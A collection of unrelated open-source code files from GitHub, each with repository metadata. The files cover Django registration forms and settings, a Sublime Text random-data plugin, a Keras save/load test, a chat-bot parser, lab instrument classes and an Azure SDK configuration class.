    def __init__(self, *args, **kwargs):
        super(AuthenticationForm, self).__init__(*args, **kwargs)
        # Relabel the stock "username" field and its error message (Polish):
        # login accepts a PESEL national ID number or an email address.
        self.fields['username'].label = _(u"Numer PESEL lub adres email")
        self.error_messages['invalid_login'] = _(u"Wprowadź poprawny numer PESEL lub adres email.")
class PeselForm(forms.ModelForm):
    """Minimal Profile form exposing only the PESEL (national ID) field."""
    class Meta:
        model = Profile
        fields = ['pesel',]
class RegisterUserFullForm(forms.ModelForm):
    """Public registration form for a Profile.

    Adds password/confirmation fields with strength validation and forces
    the two consent checkboxes to be required and initially unticked.
    """

    password = PasswordField(label=_("Password"))
    password_confirm = PasswordField(label=_("Password confirmation"))

    def __init__(self, *args, **kwargs):
        super(RegisterUserFullForm, self).__init__(*args, **kwargs)
        # Both consent fields render as mandatory, unticked checkboxes.
        for field_name in ('consent_processing_of_personal_data',
                           'accept_of_sending_data_to_WOSP'):
            checkbox = self.fields[field_name]
            checkbox.is_checkbox = True
            checkbox.required = True
            checkbox.initial = False

    def clean_password_confirm(self):
        confirmation = self.cleaned_data.get('password_confirm')
        if self.cleaned_data.get('password') != confirmation:
            raise forms.ValidationError(_("Passwords doesn't match."))
        return confirmation

    def save(self, commit=True):
        # Hash the password instead of storing the raw form value.
        instance = super(RegisterUserFullForm, self).save(commit=False)
        instance.set_password(self.cleaned_data["password"])
        if commit:
            instance.save()
        return instance

    class Meta:
        model = Profile
        fields = ['pesel','email', 'photo', 'first_name', 'last_name', 'street', 'house', 'flat', 'zip', 'city', 'phone',
                  'workplace_name', 'workplace_address', 'workplace_zip', 'workplace_city', 'password','password_confirm',
                  "consent_processing_of_personal_data", "accept_of_sending_data_to_WOSP"]
class AdminRegisterUserFullForm(RegisterUserFullForm):
    """Admin variant of the registration form: consent is implied, not asked.

    The two consent fields are redeclared (small hack kept from the original)
    so they still appear on the form, then forced to True during cleaning.
    """

    consent_processing_of_personal_data = forms.BooleanField(required=False, initial=True)
    accept_of_sending_data_to_WOSP = forms.BooleanField(required=False, initial=True)

    def __init__(self, *args, **kwargs):
        super(AdminRegisterUserFullForm, self).__init__(*args, **kwargs)
        # Undo the "required" flag set by the parent form's __init__.
        for field_name in ('consent_processing_of_personal_data',
                           'accept_of_sending_data_to_WOSP'):
            self.fields[field_name].required = False

    def clean(self):
        data = self.cleaned_data
        data['consent_processing_of_personal_data'] = True
        data['accept_of_sending_data_to_WOSP'] = True
        return data
| {
"content_hash": "25d92df0a3a33ca95519af4932f0a50d",
"timestamp": "",
"source": "github",
"line_count": 87,
"max_line_length": 121,
"avg_line_length": 45.01149425287356,
"alnum_prop": 0.7040347293156282,
"repo_name": "jacoor/sew_django",
"id": "79fafa8e74f6e8d3217a5dd862e1ffa72356482d",
"size": "3941",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "sew_django/profiles/forms.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "511"
},
{
"name": "HTML",
"bytes": "11190"
},
{
"name": "Nginx",
"bytes": "2138"
},
{
"name": "Python",
"bytes": "50203"
}
],
"symlink_target": ""
} |
"""
DB abstraction for <Project_name>
"""
from <project_name>.db.api import * # noqa
| {
"content_hash": "21edef09b1f1fd424e11bc97707d3e45",
"timestamp": "",
"source": "github",
"line_count": 5,
"max_line_length": 43,
"avg_line_length": 17.4,
"alnum_prop": 0.6551724137931034,
"repo_name": "hahaps/openstack-project-generator",
"id": "887cc3d597b4754854d339646df0eb223e8a81a9",
"size": "818",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "template/<project_name>/db/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "689778"
},
{
"name": "Shell",
"bytes": "23190"
}
],
"symlink_target": ""
} |
import sublime
import sublime_plugin
import random as r
import datetime
import string
import os
import uuid
import logging
PACKAGES_PATH = os.path.dirname(os.path.realpath(__file__))
def get_settings():
    """Return the plugin's Sublime settings object."""
    settings_file = 'Random.sublime-settings'
    return sublime.load_settings(settings_file)
"""
Base class for the Random generator. Extends the WindowCommand and adds helper methods
"""
class RandomWindow(sublime_plugin.WindowCommand):
    """Base window command.

    Prompts for a "start,stop" range in an input panel and forwards the
    parsed bounds to the text command named by ``self.text_command``.
    """

    def default_range(self):
        """Default range shown in the input panel.

        This should be persisted somehow (TODO kept from the original).
        """
        return '1,100'

    def get_range(self, input_text):
        """Parse *input_text* as "start,stop" integers and run the command.

        Bug fix: the original raised its helpful "Maybe you meant ..." hint
        inside the same ``try`` block that caught it, so the user only ever
        saw the generic parse error. The ordering check now lives outside
        the parse handler, and the broad ``except`` has been narrowed to
        ``ValueError`` so genuine failures in ``insert`` are not hidden.
        """
        try:
            cleaned = input_text.replace(' ', '')
            start_text, stop_text = cleaned.split(',')  # ValueError if not exactly 2 parts
            start = int(start_text)
            stop = int(stop_text)
        except ValueError as e:
            logging.exception(e)
            sublime.error_message('Must be two comma separated integers')
            return
        if start > stop:
            sublime.error_message('Invalid format. Maybe you meant: {},{}?'.format(stop, start))
            return
        self.insert({'start': start, 'stop': stop})

    def insert(self, kwargs):
        """Run the configured text command in the active view."""
        view = self.window.active_view()
        view.run_command(self.text_command, kwargs)
"""
Base class for the Random generator. Extends the window and adds helper methods
"""
class RandomText(sublime_plugin.TextCommand):
    """Base text command: inserts generator output at every selection."""
    def insert(self, view, generator):
        # NOTE(review): the parameter named `view` here is the `edit` token
        # that Sublime passes to TextCommand.run; it is only forwarded to
        # View.insert. Confirm before renaming.
        sels = self.view.sel()
        for region in sels:
            # A fresh value per selection, so multi-cursor inserts differ.
            output = generator()
            self.view.insert(view, region.begin(), output)
    def get_data_file(self, filename):
        # Read one asset file (shipped next to this plugin) into a list of
        # lines. The file is re-read on every call.
        words = []
        word_file = os.path.join(PACKAGES_PATH + '/assets', filename)
        with open(word_file) as f:
            words = f.read().splitlines()
        return words
    def get_words(self):
        return self.get_data_file('words.txt')
    def get_first_names(self):
        return self.get_data_file('first_names.txt')
    def get_last_names(self):
        return self.get_data_file('last_names.txt')
    def get_countries(self):
        return self.get_data_file('countries.txt')
"""
Window commands
"""
class RandomIntWindowCommand(RandomWindow):
    """Prompt for a range, then insert a random integer."""

    def run(self):
        self.text_command = 'random_int'
        caption = 'Random integer from-to'
        self.window.show_input_panel(caption, self.default_range(), self.get_range, None, None)
class RandomFloatWindowCommand(RandomWindow):
    """Prompt for a range, then insert a random float."""

    def run(self):
        self.text_command = 'random_float'
        caption = 'Random float from-to'
        self.window.show_input_panel(caption, self.default_range(), self.get_range, None, None)
"""
END Window commands
"""
"""
Text commands
"""
class RandomIntCommand(RandomText):
    """Insert a random integer drawn from [start, stop]."""

    def generate_int(self):
        return str(r.randint(self.start, self.stop))

    def run(self, view, **kwargs):
        self.start, self.stop = kwargs['start'], kwargs['stop']
        self.insert(view, self.generate_int)
class RandomFloatCommand(RandomText):
    """Insert a random float drawn from [start, stop], in %g notation."""

    def generate_float(self):
        value = r.uniform(self.start, self.stop)
        return '{0:g}'.format(value)

    def run(self, view, **kwargs):
        self.start, self.stop = kwargs['start'], kwargs['stop']
        self.insert(view, self.generate_float)
class RandomLetterCommand(RandomText):
    """Insert 3-20 random ASCII letters."""

    def generate_letters(self):
        length = r.randint(3, 20)
        return ''.join(r.choice(string.ascii_letters) for _ in range(length))

    def run(self, view, **kwargs):
        self.insert(view, self.generate_letters)
class RandomLetterAndNumberCommand(RandomText):
    """Insert 3-20 random ASCII letters and digits."""

    def generate_letters_and_numbers(self):
        alphabet = string.ascii_letters + string.digits
        length = r.randint(3, 20)
        return ''.join(r.choice(alphabet) for _ in range(length))

    def run(self, view, **kwargs):
        self.insert(view, self.generate_letters_and_numbers)
class RandomWordCommand(RandomText):
    """Insert one random word from the bundled word list."""

    def generate_word(self):
        return r.choice(self.get_words())

    def run(self, view, **kwargs):
        self.insert(view, self.generate_word)
class RandomTextCommand(RandomText):
    """Insert 24 random words separated by single spaces."""

    def generate_text(self):
        words = self.get_words()
        picks = [r.choice(words) for _ in range(24)]
        return ' '.join(picks)

    def run(self, view, **kwargs):
        self.insert(view, self.generate_text)
class RandomUuidCommand(RandomText):
    """Insert a random version-4 UUID in its canonical string form."""

    def generate_uuid(self):
        return '{}'.format(uuid.uuid4())

    def run(self, view, **kwargs):
        self.insert(view, self.generate_uuid)
class RandomFirstNameCommand(RandomText):
    """Insert one random first name from the bundled list."""

    def generate_first_name(self):
        return r.choice(self.get_first_names())

    def run(self, view, **kwargs):
        self.insert(view, self.generate_first_name)
class RandomLastNameCommand(RandomText):
    """Insert one random last name from the bundled list."""

    def generate_last_name(self):
        return r.choice(self.get_last_names())

    def run(self, view, **kwargs):
        self.insert(view, self.generate_last_name)
class RandomFullNameCommand(RandomText):
    """Insert a random "First Last" name pair."""

    def generate_full_name(self):
        first = r.choice(self.get_first_names())
        last = r.choice(self.get_last_names())
        return '%s %s' % (first, last)

    def run(self, view, **kwargs):
        self.insert(view, self.generate_full_name)
class RandomUrlCommand(RandomText):
    """Insert a random, plausible-looking lowercase URL."""

    def generate_url(self):
        """Build ``scheme://word.com/word/word?a=word&b=word#word``."""
        # Perf fix: read the word list once. The original called
        # self.get_words() inside the comprehension, re-reading the asset
        # file from disk for every one of the seven word choices.
        words = self.get_words()
        r_words = [r.choice(words) for _ in range(7)]
        scheme = r.choice(['http', 'https'])
        domain = r_words[0]
        path = '/'.join(r_words[1:3])
        query = 'a=%s&b=%s' % (r_words[4], r_words[5])
        fragment = r_words[6]
        url = '%s://%s.com/%s?%s#%s' % (scheme, domain, path, query, fragment)
        return url.lower()

    def run(self, view, **kwargs):
        self.insert(view, self.generate_url)
class RandomEmailCommand(RandomText):
    """Insert a random lowercase email; domain lists can be overridden in settings."""

    def generate_email(self):
        settings = get_settings()
        local_part = r.choice(self.get_words())
        domain_choices = settings.get('random_email_main_domain_override', self.get_words())
        domain = r.choice(domain_choices)
        tld_choices = settings.get('random_email_top_level_domain_override', ['com', 'net', 'edu'])
        top_domain = r.choice(tld_choices)
        return ('%s@%s.%s' % (local_part, domain, top_domain)).lower()

    def run(self, view, **kwargs):
        self.insert(view, self.generate_email)
class RandomHexColorCommand(RandomText):
    """Insert a random #rrggbb hex color."""

    def generate_hex_color(self):
        return '#{:06x}'.format(r.randint(0, 0xFFFFFF))

    def run(self, view, **kwargs):
        self.insert(view, self.generate_hex_color)
class RandomDateCommand(RandomText):
    """Insert an ISO date within +/-10 years of today."""

    def generate_random_date(self):
        year = r.randint(datetime.datetime.now().year - 10, datetime.datetime.now().year + 10)
        month = r.randint(1, 12)
        day = r.randint(1, 28)  # 28 keeps the day valid for every month
        return datetime.date(year, month, day).isoformat()

    def run(self, view, **kwargs):
        self.insert(view, self.generate_random_date)
class RandomTimeCommand(RandomText):
    """Insert a random HH:MM:SS time."""

    def generate_random_time(self):
        hour, minute, second = r.randint(0, 23), r.randint(0, 59), r.randint(0, 59)
        return datetime.time(hour, minute, second).isoformat()

    def run(self, view, **kwargs):
        self.insert(view, self.generate_random_time)
class RandomDatetimeRfc3339Command(RandomText):
    """Insert a random RFC 3339 timestamp with a random whole-hour offset."""

    def generate_random_datetime_rfc3339(self):
        year = r.randint(datetime.datetime.now().year - 10, datetime.datetime.now().year + 10)
        month = r.randint(1, 12)
        day = r.randint(1, 28)
        date = datetime.date(year, month, day)
        hour = r.randint(0, 23)
        minute = r.randint(0, 59)
        second = r.randint(0, 59)
        time = datetime.time(hour, minute, second)
        # Offset in whole hours, -12 .. +12; zero renders as "Z".
        offset = r.randint(0, 24) - 12
        if offset == 0:
            return "%sT%sZ" % (date.isoformat(), time.isoformat())
        return "%sT%s%+03d:00" % (date.isoformat(), time.isoformat(), offset)

    def run(self, view, **kwargs):
        self.insert(view, self.generate_random_datetime_rfc3339)
class RandomIpv4AddressCommand(RandomText):
    """Insert a random dotted-quad IPv4 address."""

    def generate_ipv4_address(self):
        octets = [str(r.randint(0, 255)) for _ in range(4)]
        return '.'.join(octets)

    def run(self, view, **kwargs):
        self.insert(view, self.generate_ipv4_address)
class RandomIpv6AddressCommand(RandomText):
    """Insert a random, fully-expanded IPv6 address."""

    def generate_hexbyte(self):
        digits = "0123456789ABCDEF"
        return r.choice(digits) + r.choice(digits)

    def generate_ipv6_address(self):
        groups = []
        for _ in range(8):
            # Each colon-separated group is two hex bytes (4 hex digits).
            groups.append(self.generate_hexbyte() + self.generate_hexbyte())
        return ':'.join(groups)

    def run(self, view, **kwargs):
        self.insert(view, self.generate_ipv6_address)
class RandomCountryCommand(RandomText):
    """Insert one random country name from the bundled list."""

    def generate_country(self):
        return r.choice(self.get_countries())

    def run(self, view, **kwargs):
        self.insert(view, self.generate_country)
"""
END Text commands
"""
| {
"content_hash": "8c255717ea8d34af70a326738467e199",
"timestamp": "",
"source": "github",
"line_count": 316,
"max_line_length": 111,
"avg_line_length": 29.446202531645568,
"alnum_prop": 0.6184846856528748,
"repo_name": "kimpettersen/random-sublime-text-plugin",
"id": "d36ca877f618fa8513112fb382d51307b0d1d445",
"size": "9305",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "random.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "9305"
}
],
"symlink_target": ""
} |
"""Tests for saving/loading function for keras Model."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import shutil
from absl.testing import parameterized
import numpy as np
from tensorflow.python import keras
from tensorflow.python.keras import keras_parameterized
from tensorflow.python.keras import testing_utils
from tensorflow.python.keras.tests import model_architectures
from tensorflow.python.platform import test
@keras_parameterized.run_with_all_saved_model_formats
class TestModelArchitectures(keras_parameterized.TestCase):
  """Save/load round-trip tests over every reference model architecture."""
  def _save_model_dir(self, dirname='saved_model'):
    # Fresh temp dir per test, removed automatically on cleanup.
    temp_dir = self.get_temp_dir()
    self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
    return os.path.join(temp_dir, dirname)
  def get_test_data(self, input_shape, target_shape):
    """Generate test dataset for testing."""
    # Shapes may be a single shape tuple or a list of them (multi-input /
    # multi-output models); the leading dimension becomes a batch of 2.
    if isinstance(input_shape, list):
      x = [
          np.random.random((2,) + input_shape[i][1:])
          for i in range(len(input_shape))
      ]
    else:
      x = np.random.random((2,) + input_shape[1:])
    if isinstance(target_shape, list):
      y = [
          np.random.random((2,) + target_shape[i][1:])
          for i in range(len(target_shape))
      ]
    else:
      y = np.random.random((2,) + target_shape[1:])
    return x, y
  def get_custom_objects(self):
    """Define custom_objects."""
    # Exercise deserialization of user-defined optimizers and losses.
    class CustomOpt(keras.optimizers.SGD):
      pass
    def custom_loss(y_true, y_pred):
      return keras.losses.mse(y_true, y_pred)
    return {'CustomOpt': CustomOpt,
            'custom_loss': custom_loss}
  @parameterized.named_parameters(*model_architectures.ALL_MODELS)
  def test_basic_saving_and_loading(self, model_fn):
    # Train one batch, save, reload with custom objects, and verify the
    # reloaded model's predictions match the original's.
    save_format = testing_utils.get_save_format()
    custom_objects = self.get_custom_objects()
    if 'subclassed_in_functional' in model_fn.__name__:
      subclass_custom_objects = {
          'MySubclassModel':
              model_architectures.MySubclassModel,
      }
      custom_objects.update(subclass_custom_objects)
    elif ('subclassed' in model_fn.__name__ and save_format == 'h5'):
      self.skipTest('Saving the model to HDF5 format requires the model to be '
                    'a Functional model or a Sequential model.')
    saved_model_dir = self._save_model_dir()
    model_data = model_fn()
    model = model_data.model
    x_test, y_test = self.get_test_data(
        model_data.input_shape, model_data.target_shape)
    model.compile('rmsprop', 'mse')
    model.train_on_batch(x_test, y_test)
    # Save model.
    out1 = model.predict(x_test)
    keras.models.save_model(model, saved_model_dir, save_format=save_format)
    # Load model.
    loaded_model = keras.models.load_model(
        saved_model_dir,
        custom_objects=custom_objects)
    out2 = loaded_model.predict(x_test)
    self.assertAllClose(out1, out2, atol=1e-05)
# Standard test entry point: allows running this file directly.
if __name__ == '__main__':
  test.main()
| {
"content_hash": "ff70267153b3dad9d7a22eb8d9367439",
"timestamp": "",
"source": "github",
"line_count": 94,
"max_line_length": 79,
"avg_line_length": 31.659574468085108,
"alnum_prop": 0.6656586021505376,
"repo_name": "renyi533/tensorflow",
"id": "fe7b7e476b015eaaab8e89bfea1fe79b4dcf52e8",
"size": "3700",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "tensorflow/python/keras/tests/model_architectures_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Assembly",
"bytes": "31572"
},
{
"name": "Batchfile",
"bytes": "55269"
},
{
"name": "C",
"bytes": "903309"
},
{
"name": "C#",
"bytes": "8562"
},
{
"name": "C++",
"bytes": "82507951"
},
{
"name": "CMake",
"bytes": "6967"
},
{
"name": "Dockerfile",
"bytes": "113964"
},
{
"name": "Go",
"bytes": "1871425"
},
{
"name": "HTML",
"bytes": "4686483"
},
{
"name": "Java",
"bytes": "988219"
},
{
"name": "Jupyter Notebook",
"bytes": "550861"
},
{
"name": "LLVM",
"bytes": "6536"
},
{
"name": "MLIR",
"bytes": "2073744"
},
{
"name": "Makefile",
"bytes": "66796"
},
{
"name": "Objective-C",
"bytes": "116558"
},
{
"name": "Objective-C++",
"bytes": "319021"
},
{
"name": "PHP",
"bytes": "4236"
},
{
"name": "Pascal",
"bytes": "318"
},
{
"name": "Pawn",
"bytes": "20422"
},
{
"name": "Perl",
"bytes": "7536"
},
{
"name": "Python",
"bytes": "37811412"
},
{
"name": "RobotFramework",
"bytes": "1779"
},
{
"name": "Roff",
"bytes": "2705"
},
{
"name": "Ruby",
"bytes": "7464"
},
{
"name": "SWIG",
"bytes": "6846"
},
{
"name": "Shell",
"bytes": "696058"
},
{
"name": "Smarty",
"bytes": "35725"
},
{
"name": "Starlark",
"bytes": "3655758"
},
{
"name": "Swift",
"bytes": "62814"
},
{
"name": "Vim Snippet",
"bytes": "58"
}
],
"symlink_target": ""
} |
from time import gmtime, strftime
from kritzbot.commandmanager import CommandManager
from kritzbot.logger import Logger
log = Logger(__name__)
class ChatStream:
    """Wraps one incoming chat message and routes it.

    Messages prefixed with '!' are treated as commands and handed to
    CommandManager; everything else goes to :meth:`nonCommand`.
    """

    def __init__(self, message, user):
        self.msg = message
        self.user = user
        # Receive time as "YYYY-MM-DD HH:MM:SS" (UTC, via gmtime).
        self.timestamp = strftime("%Y-%m-%d %H:%M:%S", gmtime())
        self.msg_length = len(message)

    def parse(self):
        """Log the message and dispatch it to the appropriate handler."""
        log.message(self.msg, self.msg_length, self.user)
        try:
            if(self.isCommand()):
                command = self.getCommand()
                command_handler = CommandManager(command, self.msg, self.user)
                command_handler.getCommand()
            else:
                self.nonCommand()
        except Exception as e:
            # Keep the bot alive on handler failures; just record them.
            log.info(e)

    def isCommand(self):
        """Return True when the message starts with the '!' prefix."""
        return self.msg[:1] == '!'

    def getCommand(self):
        """Return the message with the leading '!' prefix removed.

        Bug fix: the original used ``self.msg.replace('!', '')``, which
        stripped *every* exclamation mark and so mangled command arguments
        such as ``!say hi!``. Only the prefix is dropped now.
        """
        return self.msg[1:]

    def nonCommand(self):
        log.info('non command detected')
        # do non command stuff here
"content_hash": "310ef653a1dcddde3b02e0a17aca14ba",
"timestamp": "",
"source": "github",
"line_count": 39,
"max_line_length": 66,
"avg_line_length": 23.46153846153846,
"alnum_prop": 0.6808743169398908,
"repo_name": "LouisBluhm/PyBot",
"id": "4d7e8cbc087c62ae1db9ed6e0236d4638ee4c743",
"size": "915",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "new_bot/kritzbot/chatstream.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "266"
},
{
"name": "HTML",
"bytes": "9466"
},
{
"name": "Python",
"bytes": "52349"
}
],
"symlink_target": ""
} |
from atom.api import Str, Int, Float, Bool, Enum
from Instrument import Instrument
class DCSource(Instrument):
    """Generic DC source instrument (voltage or current output)."""
    # Whether the output is currently enabled.
    output = Bool(False).tag(desc='Output enabled')
    # Source mode: constant-voltage or constant-current.
    mode = Enum('voltage', 'current').tag(desc='Output mode (current or voltage source)')
    # Programmed output level; volts or amps depending on `mode`.
    value = Float(0.0).tag(desc='Output value (current or voltage)')
class YokoGS200(DCSource):
    """Yokogawa GS200 DC source."""
    # Full-scale output range setting (units depend on output mode).
    outputRange = Enum(1e-3, 10e-3, 100e-3, 200e-3, 1, 10, 30).tag(desc='Output range')
    def json_encode(self, matlabCompatible=False):
        """Serialize; the MATLAB side expects the key 'range', not 'outputRange'."""
        jsonDict = super(YokoGS200, self).json_encode(matlabCompatible)
        if matlabCompatible:
            jsonDict['range'] = jsonDict.pop('outputRange')
        return jsonDict
"content_hash": "6e8434d6e70ea70f1f970fb7b83e8596",
"timestamp": "",
"source": "github",
"line_count": 17,
"max_line_length": 86,
"avg_line_length": 37.294117647058826,
"alnum_prop": 0.7334384858044164,
"repo_name": "rmcgurrin/PyQLab",
"id": "e5fd750d6da2af97cdc4da3356f30b98c0919f97",
"size": "634",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "instruments/DCSources.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "104179"
}
],
"symlink_target": ""
} |
"""
Django settings for fitnessTracker project.
Generated by 'django-admin startproject' using Django 1.9.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.9/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): the secret key is hard-coded and committed to the repo;
# move it to an environment variable before any production deployment.
SECRET_KEY = '51p-k857m0p#0x_7_8(xf(mrixd8zun)zvinh#)!)%j9g)c*e5'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'userFit',
    'activity',
    'psycopg2',  # NOTE(review): psycopg2 is a DB driver, not a Django app — confirm it belongs here
    'corsheaders',
    'rest_framework',
    # 'rest_framework.authtoken',
]
# Custom user model lives in the userFit app.
AUTH_USER_MODEL = 'userFit.UserProfile'
MIDDLEWARE_CLASSES = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    # CorsMiddleware is placed before CommonMiddleware, as django-cors-headers requires.
    'corsheaders.middleware.CorsMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
AUTHENTICATION_BACKENDS = (
    'django.contrib.auth.backends.ModelBackend',
)
ROOT_URLCONF = 'fitnessTracker.urls'
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]
# DRF: endpoints require authentication by default; responses are paginated.
REST_FRAMEWORK = {
    'DEFAULT_PERMISSION_CLASSES': [
        'rest_framework.permissions.IsAuthenticated',
    ],
    'PAGE_SIZE': 100
}
WSGI_APPLICATION = 'fitnessTracker.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
# DATABASES = {
#     'default': {
#         'ENGINE': 'django.db.backends.postgresql_psycopg2',
#         'NAME': 'fitness',
#         'USER': 'postgres',
#         'PASSWORD': '',
#         'HOST': '104.167.100.64',
#         'PORT': '8456',
#     }
# }
# Credentials come from the environment; empty-string fallbacks mean a
# misconfigured environment fails only at connect time.
DATABASE_USER = os.environ.get("FITNESS_DB_USER", '')
DATABASE_PASSWORD = os.environ.get("FITNESS_DB_PASSWORD", '')
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.postgresql_psycopg2',
        'NAME': 'fitnessTracker',
        'USER': DATABASE_USER,
        'PASSWORD' : DATABASE_PASSWORD,
        'HOST': 'workout.cib1bj0g7xy8.us-east-1.rds.amazonaws.com',
        'PORT': '4876',
    }
}
# NOTE(review): CORS is wide open; restrict origins for production.
CORS_ORIGIN_ALLOW_ALL = True
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
#
# AUTH_PASSWORD_VALIDATORS = [
#     {
#         'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
#     },
#     {
#         'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
#     },
#     {
#         'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
#     },
#     {
#         'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
#     },
# ]
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = "/var/www/"
| {
"content_hash": "3cc23582e9303fd95eaa5530a7a35c69",
"timestamp": "",
"source": "github",
"line_count": 156,
"max_line_length": 93,
"avg_line_length": 27.076923076923077,
"alnum_prop": 0.6647727272727273,
"repo_name": "Girardvjonathan/anotherFitnessApp",
"id": "b9f16fc8d3eaef9c9485e8a86b028ec333eee3c1",
"size": "4224",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "fitnessTracker/settings.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "21388"
},
{
"name": "Shell",
"bytes": "478"
}
],
"symlink_target": ""
} |
import sys
from typing import Any, TYPE_CHECKING
from azure.core.configuration import Configuration
from azure.core.pipeline import policies
from azure.mgmt.core.policies import ARMChallengeAuthenticationPolicy, ARMHttpLoggingPolicy
from ._version import VERSION
if sys.version_info >= (3, 8):
from typing import Literal # pylint: disable=no-name-in-module, ungrouped-imports
else:
from typing_extensions import Literal # type: ignore # pylint: disable=ungrouped-imports
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from azure.core.credentials import TokenCredential
class OperationsManagementClientConfiguration(Configuration):  # pylint: disable=too-many-instance-attributes
    """Configuration for OperationsManagementClient.
    Note that all parameters used to create this instance are saved as instance
    attributes.
    :param credential: Credential needed for the client to connect to Azure. Required.
    :type credential: ~azure.core.credentials.TokenCredential
    :param subscription_id: Gets subscription credentials which uniquely identify Microsoft Azure
     subscription. The subscription ID forms part of the URI for every service call. Required.
    :type subscription_id: str
    :keyword api_version: Api Version. Default value is "2015-11-01-preview". Note that overriding
     this default value may result in unsupported behavior.
    :paramtype api_version: str
    """
    def __init__(self, credential: "TokenCredential", subscription_id: str, **kwargs: Any) -> None:
        # Validate required parameters eagerly so misconfiguration fails at
        # construction time rather than on the first request.
        super(OperationsManagementClientConfiguration, self).__init__(**kwargs)
        api_version = kwargs.pop("api_version", "2015-11-01-preview")  # type: Literal["2015-11-01-preview"]
        if credential is None:
            raise ValueError("Parameter 'credential' must not be None.")
        if subscription_id is None:
            raise ValueError("Parameter 'subscription_id' must not be None.")
        self.credential = credential
        self.subscription_id = subscription_id
        self.api_version = api_version
        # Default OAuth scope for ARM; callers may override via kwargs.
        self.credential_scopes = kwargs.pop("credential_scopes", ["https://management.azure.com/.default"])
        kwargs.setdefault("sdk_moniker", "mgmt-operationsmanagement/{}".format(VERSION))
        self._configure(**kwargs)
    def _configure(
        self, **kwargs  # type: Any
    ):
        # type: (...) -> None
        # Build the standard pipeline policies, letting any caller-supplied
        # policy in kwargs take precedence over the default.
        self.user_agent_policy = kwargs.get("user_agent_policy") or policies.UserAgentPolicy(**kwargs)
        self.headers_policy = kwargs.get("headers_policy") or policies.HeadersPolicy(**kwargs)
        self.proxy_policy = kwargs.get("proxy_policy") or policies.ProxyPolicy(**kwargs)
        self.logging_policy = kwargs.get("logging_policy") or policies.NetworkTraceLoggingPolicy(**kwargs)
        self.http_logging_policy = kwargs.get("http_logging_policy") or ARMHttpLoggingPolicy(**kwargs)
        self.retry_policy = kwargs.get("retry_policy") or policies.RetryPolicy(**kwargs)
        self.custom_hook_policy = kwargs.get("custom_hook_policy") or policies.CustomHookPolicy(**kwargs)
        self.redirect_policy = kwargs.get("redirect_policy") or policies.RedirectPolicy(**kwargs)
        self.authentication_policy = kwargs.get("authentication_policy")
        # Default to ARM challenge-based auth when a credential is present
        # and no explicit authentication policy was provided.
        if self.credential and not self.authentication_policy:
            self.authentication_policy = ARMChallengeAuthenticationPolicy(
                self.credential, *self.credential_scopes, **kwargs
            )
| {
"content_hash": "f8cf8c2d3b0cfd96b5ba826a50f1df7f",
"timestamp": "",
"source": "github",
"line_count": 68,
"max_line_length": 109,
"avg_line_length": 51.294117647058826,
"alnum_prop": 0.716743119266055,
"repo_name": "Azure/azure-sdk-for-python",
"id": "75df0524e20b03a4491670da34a0414463496bfd",
"size": "3956",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "sdk/operationsmanagement/azure-mgmt-operationsmanagement/azure/mgmt/operationsmanagement/_configuration.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "1224"
},
{
"name": "Bicep",
